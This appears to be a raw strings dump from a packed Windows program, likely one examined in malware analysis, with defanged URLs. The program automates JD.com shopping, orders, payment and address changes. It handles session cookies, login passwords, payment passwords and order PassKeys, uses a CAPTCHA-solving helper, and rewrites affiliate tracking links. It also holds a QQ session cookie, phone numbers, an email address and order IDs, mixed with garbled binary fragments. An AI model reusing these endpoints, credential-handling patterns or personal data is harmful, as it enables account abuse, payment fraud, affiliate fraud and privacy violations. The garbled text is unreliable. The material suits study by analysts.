cashier.jd.com
pay.jd.com
[payUrl=
[chinabankPayUrl=
@Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3
.*?)['"]
(http.{0,1}:\/\/cashier.jd.com\/payment.*?
.*?)".*?
bankChoose_Common.action
instead_confirm.action
pay.jd.com/payment/bankChoose_Common.action
cashier.jd.com/payment/pay.action
https
cashier.jd.hk
hXXps://cashier.jd.hk/cashier/wechat
hXXps://cashier.jd.hk/cashier?token=
hXXps://cashier.jd.hk
hXXps://cashier.jd.hk/cashier/wechat?token=
hXXps://cashier.jd.com/payment/paymentConfirm.action?paySign=
hXXp://cashier.jd.com/payment/paymentConfirm.action
hXXps://mapi.wangyin.com/PayGate
hXXps://cashier.jd.com/payment/paymentConfirm.action
][chinabankPayUrl=
http:
].orderTyp
hXXps://pay.m.jd.com/newpay/index.action
payParamsObject.payChannelList
].channelName
payParamsObject.payChannelList[
].status
].balance
].baitiaoOrderPrice
hXXps://pay.m.jd.com/newpay/baiTiaoPayResult.action
installmentNum=1&password=
baiTiaoPayResult.isSuccess
baiTiaoPayResult.info
orderInfo.price
orderInfo.orderStatus
].amount
&PassKey=.{1,52}?)["']
order.jd.com\/normal\/item.action\?(orderid=
order.jd360.hk\/normal\/item.action\?(orderid=
passkey
hXXp://api.m.jd.com/client.action?functionId=thirdAddress&uuid=
hXXp://pe.3.cn/prices/mgets?callback=reaPriceCb&origin=4&skuids=
hXXp://pe.3.cn/prices/mgets?callback=reaPriceCb&origin=5&skuids=
C:\Windows\System32\systemvc.dll
ø__
<V2WO.XjW2%
EAUT32.dllI
$@15638236
7*s %d. (0x%X
IsBad.adPtr,9
lvrcpyn.nbal
.tiBy
t1lusShuI
AUrl
.RH(H1
KERNEL32.DLL
MSVCRT.dll
WININET.dll
GetUrlCacheEntryInfoA
AntiVC.dll
6.VOT,,f
1412341
oeL
dl%c<
B7.mv
4542352
%sff2
@ZS%U9
-v%X<
\Data\huoniu_cookie.mdb
}#5.0#0#
C:\Progr
@21.tlb
ID="{0D0A4A9E-A566-4678-84F5-0F6453B6DBDA}"
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
&H00000001={3832D640-CF90-11CF-8E43-00A0C9
2930726881
2636696609
201381685
201260775
3273270
201494267
3317239657
201299812
204661500(
201995144
201829618
2335735314
13928006026
[1242930*1]
2982065275
[904762*1]
9376165835 _
13570625555
[1462425*1]
201260775
9376149671
2821437085
123456789
18003617555
[999065*1]
2251088269
[1015683*1][732505*1]
3272256966
17007264933
[763749*1]
2239638269
9487339259
18686605052
[526928*1]
13591755579
[503201*1]
3286663522
9485365741
13512786331
[1250264*1]
9478913914"
13737673091
[328266*1]
9478949329"
328468316
[854234*6]
3290878242
[1082266*1]
[1522631641*17]
32300.00
3207073542
15304608777
[763751*17]
9560130136
13012155484
2960633086
9524866484 _
9524732199
2368336536
[695467*1][208399*1]
[695467*1]
9491175586
[905198*1]
9488117806
9487979523
9487899493
13510779427
[1238332*3]
15018097217
[1577292*1]
3092085361
13015542006
[1163863*3]
9569460688
[383756*1]
13530395139
[547729*4]
13975199715
9740125254
13975199491
[1238332*1][836677*1]
9722232555
9722145122
9722083441
9722081041
13476607992
3290812071
13728390383
[1419022*2]
2035846384
9780807646
[905174*3]
9780787802
9747268569
9747357940
9747257047
9747255179
9747254519
[206803*3]
[1180402*1]
[1476554*1][1476573*1]
13503100056
[1125083*1]
9837604250_[
[436666*1][836670*1]
0F3D-2DCF-20CE-CEE6(
)7CC7-1F5B-4CDB-CB22(
9837516230_[
15267093081
C600-F6C9-DBBE-08B8(
9837513102_[
pt2gguin=o0201381685; uin=o0201381685; skey=@6MZHo
[1089805*1]
201842638
[1400285*1]
3269527357
13251445154
[1118445*2]
2091323442
13156173748
[695466*1]
9635222488
13813239719
[1488247*1][1651087*1]
wei04668xiongyo@163.com
[1597988344*1]
3277635383
9438342103
[811629*1]
9372775139
18954680168
[854210*1]
[1125083*1][1364481*1]
8792021129
13733321666
[1184117722*1]
1031965481
9834565427
17256874570
40-3-504
[685890*1]
0181-ADD9-12FE-5D1C|
9747308346
)|7CC7-1F5B-4CDB-CB22(
9722239561 _
3248673032
[1130831*4]
3203644230
9569218714 _
9488065356
9487413530
9478920126"
9388506453
[854804*1]
13153540888
[854240*1]
[854210*60]
[854210*80]
[1364481*1]
13822990755
[1359446*1]
9837608105_[
9790324005 _
13290984998
9747273238
17007264833
9488075812
13022144979
9478938923"
154772820
9440236394 _
13075078109
[695467*1][526831*2]
3039710368
9440099259 _
692458721
9435971037
13469280430
[1238332*1]
9433712169
13095627624
[616587*1]
9388541527
2096613397
9721768790
3252214913
9718748318>
13026515985
[407901*1]
3287077061
[208399*1]
9491322442
9747307138
9747255935
9743861108
9743788066 _
9722224820
9722215252
9834570666
17256874569
9790320611
13510444929
_*.txt
\*.ini
v_getsignKey
v_getPCFUrlALL
v_getAPPFUrl
v_getKey2
v_getSkey
\CouponKey.ini
loginpwd
payURL
192.168.1.1
\UUWiseHelper.dll
E:\work\UUWiseHelper
\UUWiseHelper.pdb
WS2_32.dll
UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
zcÁ
0(1,10141
9 9<9@9`9
:-1014,URL
:-19011,
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=exun006&area=&networkType=wifi&sign=
hXXp://api.m.jd.com/client.action?functionId=easyBuyGetAddress&uuid=
body={}
hXXp://api.m.jd.com/client.action?functionId=easyBuyDeleteAddress&uuid=
hXXp://easybuy.jd.com/address/getEasyBuyList.action
hXXp://trade.jd.com/shopping/dynamic/consignee/deleteConsignee.action
hXXp://trade.jd.com/shopping/order/getOrderInfo.action?rid=
consigneeParam.id=
hXXp://easybuy.jd.com/address/deleteAddress.action
hXXp://easybuy.jd.com/address/getEasyBuyList.action#none
hXXp://trade.z.jd.com/funding/remove_address.action
hXXp://trade.z.jd.com/funding/support_project.action?projectId=19780&redoundId=77248&org=pc
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=1-1-0&networkType=wifi&sign=
hXXp://i.m.jd.com/client.action?functionId=cancleOrder&body=
hXXp://orderop.jd.com/toolbar_showCancelButtonListNew?callback=jQuery5839309&orderList=
passKey":"
url":"new/
&key=
hXXp://orderop.jd.com/
hXXp://orderop.jd.com/toolbar_getRefundType?callback=jsonp1411183792873&_=1411183792990&orderid=
hXXp://orderop.jd.com/toolbar_getOrderInfo?callback=jsonp1411183792875&_=1411183792992&orderid=
','cancelReason':'','refundType':1}
','cancelReasonId':'
','customPhNo':'
hXXp://orderop.jd.com/toolbar_cancelOrder?callback=jsonp1411182974969&_=1411182993229&action=cancelOrder&orderid=
cancelOrder.html?1&cancalText=0&isHaveGiftOrder=0
'}&_=
hXXp://orderop.jd.com/toolbar_cancelOrder?callback=jQuery4552199&action=cancelOrder&orderid=
hXXp://orderop.jd.com/toolbar_getRefundType?callback=jQuery4552199&orderid=
hXXp://odo.jd.com/oc/refundOrder.html?orderId=
hXXp://orderop.jd.com/toolbar_getOrderInfo?callback=jQuery9053785&orderid=
}&_=
","cancelReason":"","refundType":
","cancelReasonId":"
","customPhNo":"
hXXp://rps.fm.jd.com/rest/refund/refundDetailFromOrderCenter?orderId=
3,6,9..;
:1,4,7,10...
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
COMCTL32.dll
MSIMG32.dll
MSVFW32.dll
SkinH_EL.dll
hXXp://VVV.zolpay.com/links/1416A4729BC6D294
hXXp://jmall.jd.com/p64928.html
text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
[1979-2010]
hXXp://192.168.1.1/userRpm/SysRebootRpm.htm?Reboot=ÖØÆô·ÓÉÆ÷
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXp://jd-ex.com/
hXXp://jd-ex.com/validateCode/genateValidate.html?checkUuid=
hXXp://jd-ex.com/queryInfo/checkWaybillOrder.html
hXXp://jd-ex.com/queryInfo/waybillTrackInfo.html
.*?>0<.*?
1-72-2799
3-51035-39620
4-113-9775
5-142-42540
6-303-36780
7-412-3547
8-560-567
9-639-640
10-698-699
11-799-3240
12-904-905
13-1000-1002
14-1114-19787
15-1158-3412
16-1303-3483
17-1381-3583
18-1482-3606
19-1601-3633
20-1715-43114
21-1827-3505
22-1930-50947
23-2121-22466
24-2144-3906-51694
25-2235-2246
26-2951-2952-21168
27-2376-4343
28-2487-2488
29-2580-21652-51875
30-2628-2629
31-2652-36684
hXXp://p.egou.com/n?k=xxx&e=891879&t=hXXp://VVV.jd.com/
hXXp://VVV.jd.com
hXXp://ad.ta355.cn/r.php?rf=...
hXXp://count.chanet.com.cn/.....
hXXp://union.click.jd.com...
hXXp://VVV.178hui.com/---
hXXp://union.click.jd.com/...
hXXps://pay3.chinabank.com.cn/PayGate
hXXps://bgw.wangyin.com/GW/pay
hXXps://netpay.cmbchina.com/netpayment/BaseHttp.dll?PrePayC2
hXXps://netpay.cmbchina.com/netpayment/BaseHttp.dll?GenQRCode?ClientNo=
.idata
.edata
P.vmp0
`.vmp1
.reloc
P.rsrc
version.dll
shell32.dll
1e.ro4A
oleaut32.dll
H0.gW
comctl32.dll
advapi32.dll
gdi32.dll
d.jF/"
r#'%C
6.Xdp
g|$^.Cn
>.bM8
>Z.Ye
w4R`$p%s*
f.zo~L^
wsock32.dll
Ë.L@
l.sQ{
c-t{.FF
b#I".wM
e.ENZ
xip.tu
@>.vO
%FX2Fsi
qKT.jLka
3.LD7
Uq
G,.gd
<.cFF=j
&8.XMj
$~O.Ba
)].Wd
/_{M%U
Q%s6|
lVfeVg
 !%uO
mh.ud
m%Csn%
kq84.QaI
)f%fg
.SuDYw
K)`p.frC
*%s!%
aR.dDb&<y
.xk 4g
)%S{.
'U}.Ue
l%S(8x$!(
1L%UJ
.vtbw
.iA5N
yyhKa%S
d.Zd=#R
x0r%F{
.IPi)
Vj.jH
>M%X9
/8[<{~@ 
bc.lTk
ks_GetMsg
kssPlugin.dll
tole32.dll
\skuConfig.ini
[123456]
[123456|234567|345678]
[1][1|1][1|2|1]
hXXp://item.jd.com/782199.html]
hXXp://p.egou.com/n?k=2mLErnWFWlwLrI6H2mLErI6****--&e=891879&t=hXXp://VVV.jd.com/
hXXp://fun.51fanli.com/goshopapi/goout/?id=544&lc=shopdetail_goumai&tc=211023&tracking_id=1109161***&go=http://VVV.jd.com/&finalurl=http://union.click.jd.com/jdc?tracking_id=1109161***&e=104833247211023&p=AyIBZRprFDJWWA1FBCVbV0IUEEULRFRBSkAOClBMW0srBEtHU1oFUwNAMhM3VxxSEQQiB1QeUhcAEQJTGFsVAxEFZXopJQ==&t=W1dCFBBFC0RUQUpADgpQTFtL
hXXp://ad.ta355.cn/r.php?rf=http://count.chanet.com.cn/click.cgi?a=504471&d=22338&u=a18898212&e=&url=http%3A%2F%2FVVV.jd.com%2F
hXXp://union.click.jd.com/jdc?e=&p=AyIBZRprFDJWWA1FBCVbV0IUEEULRFRBSkAOClBMW2VEBVBDT1cdQw4lAyICZWtbFAMSBVAfWBVSEgRXGlMcARY3N***&t=W1dCFBBFC0RUQUpADgpQTFs=
hXXp://VVV.51bi.com/u/vUFzI3/
hXXp://dwz.cn/1gqao6
hXXp://c.duomai.com/track.php?site_id=xxx&aid=xx&euid=&t=http://VVV.jd.com/
hXXp://union.click.jd.com/jdc?d=QTjqgK
hXXp://union.click.jd.com/jdc?e=&p=AyIHZR5bEgoWBFYfXSUCFgVUHVsXBRYGZV8ETVxNNwxeHlQJDBkNXg9JHUlSSkkFSRwSA1caXRUAFQNUBAJQXk83IGg4bVRvXjd4W00cbnsDWVlAAltgAxdXJQMiB1QaWhQGEwRUHmslY2A3FHVZEgYXBmUeWxICGgJdGFwlAhcAURNTFgcRBlUfWSUAEg==&t=W1dCFBBFC1pXUwkEAEAdQFkJBVsRABMBVRlcEQMNXhBHBg==
orderInfo.orderStatusShow
orderInfo.sendTime
orderInfo.sendTip
(*.txt)|*.txt
*.xls|*.xls
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=baidu&area=&networkType=wifi&sign=
hXXp://ware.m.jd.com/client.action?functionId=thirdAddress&uuid=
hXXp://cart.jd.com/cart/initCart.action?pcount=
hXXp://cart.jd.com/cart/dynamic/gate.action?pid=
hXXp://cart.jd.hk/gate.action?pid=
hXXp://gate.jd.com/InitCart.aspx?pid=
hXXp://item.jd.hk/
hXXp://item.jd.com/
hXXp://p.3.cn/prices/mgets?skuids=J_
hXXp://cart.jd.com/cart/initCart.action?pid=
hXXp://cart.jd.com/tcart?pid=
cart.specialSuits
].products
cart.specialSuits[
].mainSku.id
].products[
].selectPromotions
].promotionType
].selectPromotions[
].promotionId
].promotionShortInfo
].promotion.promoId
hXXp://cart.jd.com/changePromotion.action
&origin=1&callback=Promotions.set
hXXp://pi.3.cn/promoinfo/get?id=
Promotions.set(
].adwordGiftSkuList
].giftType
].adwordGiftSkuList[
].skuId
hXXp://cart.jd.com/cart/removeGiftFromCart.action
].promoId
hXXp://cart.jd.hk/cart?r=
hXXp://cart.jd.com/cart/getCart.action?r=
].promotionSelectState
hXXp://cart.jd.com/changeJbeanPromotion.action?rd
application/x-www-form-urlencoded; charset=UTF-8
hXXp://cart.jd.hk/gotoOrder.action?flowId=10&rd=
hXXp://cart.jd.com/cart
authorize.jd.hk
hXXp://cart.jd.com/cart.action?r=
hXXp://authorize.jd.hk/auth/doAuth.action?r=
hXXp://authorize.jd.hk/auth/authPage.action
hXXp://trade.jd.hk/order/getOrderInfo.action?flowId=10&rid=
trade.jd.hk
hXXp://trade.jd.com/shopping/dynamic/balance/useBalance.action
hXXp://trade.jd.hk/shopping/order/getOrderInfo.action?flowId=10rid=
hXXp://trade.jd.com/shopping/async/obtainOrderExt.action
hXXp://trade.jd.com/shopping/order/getOrderInfo.action?rid=1439647032374
&submitOrderParam.remark=
hXXp://cart.jd.com/selectAllItem.action
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
&srcid=trackWeb&is=
hXXp://captcha.jd.com/verify/image?acid=
&submitOrderParam.checkCodeRid=
&submitOrderParam.checkcodeTxt=
hXXp://x.jd.com/clkinfo?rid=
&submitOrderParam.sopNotPutInvoice=true&submitOrderParam.trackID=
&submitOrderParam.payPassword=
.action
hXXp://trade.jd.hk/shopping/order/submit
&submitOrderParam.sopNotPutInvoice=false&submitOrderParam.payPassword=
overseaPurchaseCookies=&submitOrderParam.trackID=
hXXp://trade.jd.com/shopping/order/submit
hXXp://success.jd.com/success/success.action?orderId=
hXXp://trade.jd.com/shopping/order/getLocOrderInfo.action?r=
hXXp://s.trade.jd.com/success/loadSuccess.action
hXXp://s.trade.jd.com
orderid=(\d{1,})&PassKey=(.*?)\\.*?ftx-01\\.\>(\d.*?)
&PassKey=
hXXp://order.jd.com/normal/item.action?orderid=
hXXp://VVV.jd.com/
hXXp://cart.jd.com/cart/cart.html?r=1409064605264
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
sortedWebCartResult.allSkuIds
hXXp://cart.jd.com/batchRemoveSkusFromCart.action
p.yiqifa.com
VVV.51bi.com
p.egou.com
c.duomai.com
hXXp://p.egou.com/n?k=2mLErnWFWlwLrI6H2mLErI6HWNRSWE4H1n2SWljqrn376mqECPPBCJ4HkQLErnzm6nXwMJ2mrIW-&e=c&t=hXXp://VVV.jd.com/|
//p.yiqifa.com
//p.egou.com
&t=hXXp://VVV.jd.com
&t=hXXp://item.jd.com/
&t=hXXp://m.jd.com
&t=hXXp://item.m.jd.com/ware/view.action?wareId=
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
union.click.jd.com/
count.chanet.com.cn/click
(hXXp://union.click.jd.com.*?)[\s"]
dwz.cn
178hui.com
hXXp://cart.jd.com/cart/dynamic/gateForSubFlow.action?wids=
hXXp://trade.jd.com/shopping/order/getPresalInfo.action?r=
&flowType=15&submitOrderParam.ignorePriceChange=0&submitOrderParam.btSupport=0
overseaPurchaseCookies=&submitOrderParam.sopNotPutInvoice=false&submitOrderParam.presalePayType=1&submitOrderParam.trackID=
&submitOrderParam.presalePayType=2&submitOrderParam.trackID=
overseaPurchaseCookies=&submitOrderParam.sopNotPutInvoice=false&submitOrderParam.presaleMobile=
keyword
hXXp://api.m.jd.com/client.action?functionId=search&uuid=
key":"
expressionKey"
expressionKey
].wareId
].venderId
&clientVersion=5.0.0&build=27662&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&&partner=jingdong1&area=
hXXp://ngw.m.jd.com/client.action?functionId=searchWareInShop&uuid=
].wname
hXXp://api.m.jd.com/client.action?functionId=skuDyInfo&uuid=
hXXp://api.m.jd.com/client.action?functionId=commentCount&uuid=
hXXp://api.m.jd.com/client.action?functionId=emTab&uuid=
hXXp://search.jd.com/Search?keyword=
&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&sttr=1&exp_key=
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
hXXp://search.jd.com/
hXXp://search.jd.com/brand.php?keyword=
item.jd.com/
hXXp://search.jd.com/s_new.php?keyword=
&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&exp_key=
&enc=utf-8&suggest=1.his.0&wq=&pvid=9usi11oi.4ve1gseiox82
//item.jd.com/
hXXp://mall.jd.com/index-
button01').click
mall.jd.com/advance_search-
hXXp://mall.jd.com/advance_search-
-60.html
hXXp://diviner.jd.com/cookie?ck=1455.
hXXp://x.jd.com/aview?ck=12072.
firefox
chrome
45.0.2454.85
||12||8||jr.jd.com||-||referral||-||0||-||
||item.jd.com||18.0 r0||win||
hXXp://csc.jd.com/log.ashx?type1=J&type2=A&pin=
$tad=-$pinid=
$zb=1$cb=16$usc=direct$ucp=-$umd=none$uct=-$lt=0$ct=
$yb=
$xb=
$wb=
$bv=
$hn=item.jd.com$fl=18.0 r0$os=win$br=
$ul=zh-cn$cs=GBK$dt=
|1&v=je=1$sc=24-bit$sr=
hXXp://mercury.jd.com/log.gif?t=VVV.100000&m=UA-J2011-1&pin=
&clientVersion=4.4.1&build=23145&client=android&d_brand=samsung&d_model=SM-N9008&osVersion=4.4.2&screen=1875*1080&partner=jingdong&area=19_1609_41655_41723&networkType=wifi&st=
hXXp://ware.m.jd.com/client.action?functionId=skuDetail&uuid=
wareInfo.shopInfo.shop.name
wareInfo.shopInfo.shop.shopId
wareInfo.basicInfo.brandID
hXXp://chat1.jd.com/api/checkChat?&callback=jQuery5455436&_=
hXXp://api.m.jd.com/client.action?functionId=addFavorite&uuid=
hXXp://t.jd.com/product/followProduct.action?productId=
hXXp://api.m.jd.com/client.action?functionId=followShop&uuid=
hXXp://follow.soa.jd.com/vender/follow?venderId=
hXXp://follow-soa.jd.com/rest/brand/follow?sysName=pinpaijie.jd.com&brandId=
hXXp://brand.jd.com/pinpai/
hideAreaIds").val('
hXXp://trade.jd.com/shopping/dynamic/consignee/consigneeList.action
hXXp://trade.jd.com/order/getOrderInfo.action?rid=
hXXp://trade.jd.com/shopping/dynamic/consignee/saveConsignee.action
hXXp://trade.jd.com/shopping/dynamic/consignee/editConsignee.action?consigneeId=
&consigneeParam.isUpdateCommonAddress=1&consigneeParam.giftSenderConsigneeName=&consigneeParam.giftSendeConsigneeMobile=&consigneeParam.noteGiftSender=false&consignee_ceshi1=&consigneeParam.idCard=&flowType=15
&consigneeParam.commonConsigneeSize=
&consigneeParam.townName=
&consigneeParam.countyName=
&consigneeParam.cityName=
&consigneeParam.provinceName=
&consigneeParam.phone=
&consigneeParam.email=
&consigneeParam.mobile=
&consigneeParam.address=
&consigneeParam.townId=
&consigneeParam.countyId=
&consigneeParam.cityId=
&consigneeParam.provinceId=
&consigneeParam.type=1&consigneeParam.name=
hXXp://trade.jd.com/shopping/dynamic/consignee/setAllDefaultAddress.action
hXXp://trade.jd.com/shopping/dynamic/invoice/editInvoice.action
hXXp://trade.jd.com/shopping/dynamic/invoice/getElectroInvoice.action
invoiceParam.electroInvoicePhone" value="
hXXp://trade.jd.com/shopping/dynamic/invoice/getGenenalInvoice.action
invokeInvoiceBasicService=true&invoiceParam.usualInvoiceId=
hXXp://trade.jd.com/shopping/dynamic/invoice/getVatInvoice.action
&invoiceParam.electroInvoicePhone=
&invoiceParam.electroInvoiceEmail=
&invoiceParam.electroCompanyName=
&invoiceParam.selectElectroTitle=
&invoiceParam.sendSeparate=false&invoiceParam.usualInvoiceId=
&invoiceParam.consigneeTownId=
&invoiceParam.consigneeTown=
&invoiceParam.consigneeCountyId=
&invoiceParam.consigneeCounty=
&invoiceParam.consigneeCityId=
&invoiceParam.consigneeCity=
&invoiceParam.consigneeProvinceId=
&invoiceParam.consigneeProvince=
&invoiceParam.consigneeAddress=
&invoiceParam.consigneePhone=
&invoiceParam.consigneeName=
&invoiceParam.hasBook=
&invoiceParam.hasCommon=
&invoiceParam.regBankAccount=
&invoiceParam.regBank=
&invoiceParam.regPhone=
&invoiceParam.regAddr=
&invoiceParam.code=
&invoiceParam.vatCompanyName=
&invoiceParam.selectNormalInvoiceContent=
&invoiceParam.selectBookInvoiceContent=
&invoiceParam.selectInvoiceTitle=
&invoiceParam.companyName=
invoiceParam.selectedInvoiceType=
hXXp://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action
hXXp://invoice.jd.com/user/userinfo/zpzz.html
hXXp://invoice.jd.com/user/zpzz/delZpzz.action
vatQualification.id=
hXXp://invoice.jd.com/user/zpzz/addZpzz.action
&vatQualification.account=
&vatQualification.bank=
&vatQualification.phone=
&vatQualification.address=
&vatQualification.taxId=
vatQualification.company=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 115Browser/5.2.6
hXXp://invoice.jd.com/user/zpAddr/updateAddress.action
hXXp://trade.jd.com/shopping/dynamic/giftCard/getGiftCardList.action
giftCardParam.giftCardType=3
hXXp://trade.jd.com/shopping/dynamic/giftCard/cancelGiftCard.action
giftCardParam.giftCardType=3&giftCardKey=
&clientVersion=5.0.0&build=27662&client=android&d_brand=samsung&d_model=GT-I8150&osVersion=4.4.2&screen=865*506&partner=jingdong1&area=
&clientVersion=5.1.0&build=31030&client=android&d_brand=ONEPLUS&d_model=A0001&osVersion=4.3&screen=1920*1080&partner=jd-m&area=
orderInfo.customerName
orderInfo.mobile
orderInfo.address
//details.jd.com/normal/item.action?orderid=
hXXp://details.jd.com/normal/item.action?orderid=
wareInfo.basicInfo.isOP
hXXp://cart.jd.com/cart/getTcart.action?pid=
].manGiftSkus
].giftSelectState
].manGiftSkus[
].giftAddMoney
].imgUrl
hXXp://img10.360buyimg.com/cms/s80x80_
].name
].mainSku.name
].mainSku.num
].mainSku.sumDiscountedPrice
hXXp://cart.jd.com/cart/addGiftsOfMZ.action
hXXp://trade.jd.hk/shopping/dynamic/consignee/editConsignee.action?consigneeId=
hXXp://trade.jd.hk/shopping/order/getOrderInfo.action?flowId=10&rid=
consigneeParam.idCard
consigneeParam.name
consigneeParam.mobile
consigneeParam.phone
consigneeParam.email
hXXp://trade.jd.hk/shopping/dynamic/consignee/consigneeList.action
hXXp://trade.jd.hk/shopping/dynamic/consignee/saveConsignee.action
&consigneeParam.idCard=
&consigneeParam.isUpdateCommonAddress=1&consigneeParam.giftSenderConsigneeName=&consigneeParam.giftSendeConsigneeMobile=&consigneeParam.noteGiftSender=false&consignee_ceshi1=
consigneeShowView.id
hXXp://trade.jd.hk/shopping/dynamic/consignee/setAllDefaultAddress.action
&consigneeParam.addType=0
&consigneeParam.isUpdateCommonAddress=1&consigneeParam.giftSenderConsigneeName=&consigneeParam.giftSendeConsigneeMobile=&consigneeParam.noteGiftSender=false&consignee_ceshi1=&consigneeParam.idCard=
hXXp://trade.jd.com/shopping/dynamic/consignee/editConsignee.action?t=
trade.jd.com
/shopping/dynamic/payAndShip/getVenderInfo.action
&shipParam.pickShipmentItemCurr=false
shipParam.payId=
&saveParam.promiseType=&saveParam.promiseDate=&saveParam.promiseTimeRange=&saveParam.promiseSendPay=&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=&saveParam.pickSiteId=&saveParam.pickDate=&saveParam.pickSiteNum=5&saveParam.pickRegionId=
&saveParam.jdBigItemInstallTimeOffest=
&saveParam.jdShipmentType=65&saveParam.jdShipTime=4&saveParam.jdPayWayId=0&saveParam.jdCheckType=2&saveParam.jdBigItemShipTimeOffset=
saveParam.paymentId=
/shopping/dynamic/payAndShip/savePayAndShip.action
/order/getOrderInfo.action?rid=
/shopping/dynamic/payAndShip/getAdditShipment.action
&shipParam.reset311=0
/shopping/order/getOrderInfo.action?rid=
selfPick.selectedPickView.pickId
selfPick.pickDate
selfPick.pickSiteNum
selfPick.pickShipSelected
&saveParam.pickRegionId=
&saveParam.pickSiteNum=
&saveParam.pickDate=
&saveParam.promiseType=1&saveParam.promiseDate=&saveParam.promiseTimeRange=&saveParam.promiseSendPay=&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=&saveParam.pickSiteId=
&saveParam.jdCheckType=2&saveParam.jdBigItemShipTimeOffset=
&saveParam.jdShipTime=3&saveParam.jdPayWayId=
&saveParam.jdShipmentType=
suportShipType
promise311.support
promise311.days
].hours
promise311.days[
].hours[
].date
promise311.timeRangeTitle[
].week
&saveParam.pickRegionId=-1
&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=&saveParam.pickSiteId=
&saveParam.promiseSendPay=
&saveParam.promiseTimeRange=
&saveParam.promiseType=1&saveParam.promiseDate=
&saveParam.jdShipTime=4&saveParam.jdPayWayId=
&saveParam.promiseMessage=&saveParam.jdBigItemNightShip=false&saveParam.otherShipmentType=&saveParam.otherShipTime=&saveParam.otherBigItemShipOffset=&saveParam.otherBigItemInstallTimeOffset=&saveParam.sopOtherShipmentType=&saveParam.pickShipmentType=64&saveParam.pickSiteId=
/shopping/async/payAndShip/getPickSiteByRegion.action
&shipParam.pickSiteNum=100&shipParam.regionId=-1
&shipParam.payId=
shipParam.pickSiteId=
].cabinetAvailable
].pickId
].pickName
].address
].pickDate
/shopping/dynamic/coupon/getCoupons.action
/shopping/dynamic/coupon/getBestVertualCoupons.action
/shopping/dynamic/coupon/cancelCoupon.action
&couponParam.pageNum=1
couponParam.couponId=
/shopping/dynamic/coupon/useCoupon.action
couponParam.couponKey=
/dynamic/coupon/cancelCoupon.action
hXXp://trade.jd.com/shopping/dynamic/jdbean/useJdBean.action
jdBeanParam.usedJdBean=0
jdBeanParam.usedJdBean=
&giftCardKey=
giftCardParam.giftCardType=
hXXp://trade.jd.com/shopping/dynamic/giftCard/useGiftCard.action
hXXp://trade.jd.com/shopping/dynamic/giftCard/useMaterialGiftCard.action
hXXp://trade.jd.com/shopping/dynamic/giftCard/bindGiftCard.action
giftCardParam.giftCardType=2
giftCardParam.giftCardType=2&giftCardKey=
for(var i = 0; i < str.length; i  ){
val  = "u"   str.charCodeAt(i).toString(16);
(payment.pay.action.id=
order.jd360.hk/normal/item.action?orderid=
hXXps://cashier.jd.hk/
name=.requestInfo.*?value="(.*?)"
name=.baiTiaoRepayDate.*?value="(.*?)"
hXXp://cashier.jd.com/lazy/checkPassword.action
hXXps://cashier.jd.com/payment/combinationVirtualPay.action
hXXps://b2c.icbc.com.cn/servlet/ICBCINBSEBusinessServlet
randomKey=
hXXps://b2c.icbc.com.cn/icbc/newperbank/NewShop/UIpretification/b2c_TwoDimensionCode_inside.jsp?dse_sessionId=
hXXp://st.3.cn/gsis.html?skuids=
hXXp://item.ko.jd.com/itemShowBtn?skuId=
/koFail.html
.jd.com/captcha
.jd.com/validate/getCaptcha?skuId=
hXXp://ko.jd.com/m/captcha.html?skuId=
hXXp://ko.jd.com/validate/getCaptcha?skuId=
.jd.com/validate/goToOrder?skuId=
url":"
.jd.com/validate/repeatGoToOrder?skuId=
koFail.html
text/html,application/xhtml xml,application/xml;q=0.9,text/vnd.wap.wml,*/*;q=0.8
.jd.com/async/getUsualAddressList.action?skuId=
[0].id
[0].mobileKey
[0].provinceId
